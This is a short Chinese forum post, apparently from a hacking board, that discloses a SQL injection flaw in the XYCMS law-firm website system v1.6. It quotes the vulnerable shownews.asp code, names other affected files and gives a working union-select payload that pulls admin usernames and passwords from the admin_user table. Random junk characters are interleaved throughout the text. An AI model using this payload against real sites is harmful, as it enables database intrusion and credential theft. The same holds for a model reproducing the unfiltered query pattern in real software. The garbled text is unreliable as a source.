前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
u ]& r7 ~% F( w , g6 }8 j& a8 }1 `$ O! _
淫荡分割线
& W" o1 Q: a/ V1 H) p* k% Z, p' A--------------------------------------------------------, x3 U! m7 R; i' U
6 o! p& g( }& _' U' j% L5 K审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
2 ~; |- n9 L1 T) G* |源码地址:http://down.chinaz.com/soft/29233.htm. N6 k, {$ G3 O/ `. l1 c& u3 a
( y2 j/ @9 T9 m" B7 w' U- |
漏洞文件:shownews.asp
) {& {0 {0 F; X/ m1 d! b漏洞代码:7-13行
# V& A' v2 L+ Q$ Q9 a
. [, i- t: U* ~2 o9 ^4 E) N6 }
! A5 i' Y2 k/ s0 z<%
3 Z' s2 N; W9 Q1 ^# Q; T8 Uid=request.QueryString("id")
( W( \8 H, o( f! w- c2 j+ r. e
! O# U2 [; i4 w4 w2 dset snews=server.createobject("adodb.recordset") / M( Z7 h9 T; p5 |. Q- H9 h6 z
exec="select * from [news] where id="&id
9 R: G" L/ K9 U/ |: G4 l7 @( Esnews.open exec,conn,1,1
1 ^' X0 J/ T9 p* H7 \( w. ~- E' s%>3 @/ ~7 \8 \# H I
/ D0 D( a: V0 u 6 f: @% Z# J3 j/ u) g- Y) d% {
什么过滤都没有 直造成注入
+ c6 A7 o- D; a7 J0 V | / _. L2 T9 x3 B7 z0 j: i
注入点:http://127.0.0.1:99/shownews.asp?id=xx
) c8 b4 }/ G5 J4 {( l' E. m3 y7 X U) d% Z6 i- m% S
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
3 w, U0 Q$ B2 b% J2 r4 z7 X2 n
" k7 L. p2 w: X9 o. I( a
- ^8 q4 |6 Q& m |' D$ u& E$ L: c* Mexp: union select 1,admin,password,4,5,7 from admin_user. Y; d# a6 C: i! H$ s
1 n, i+ T" w8 m( P. U
|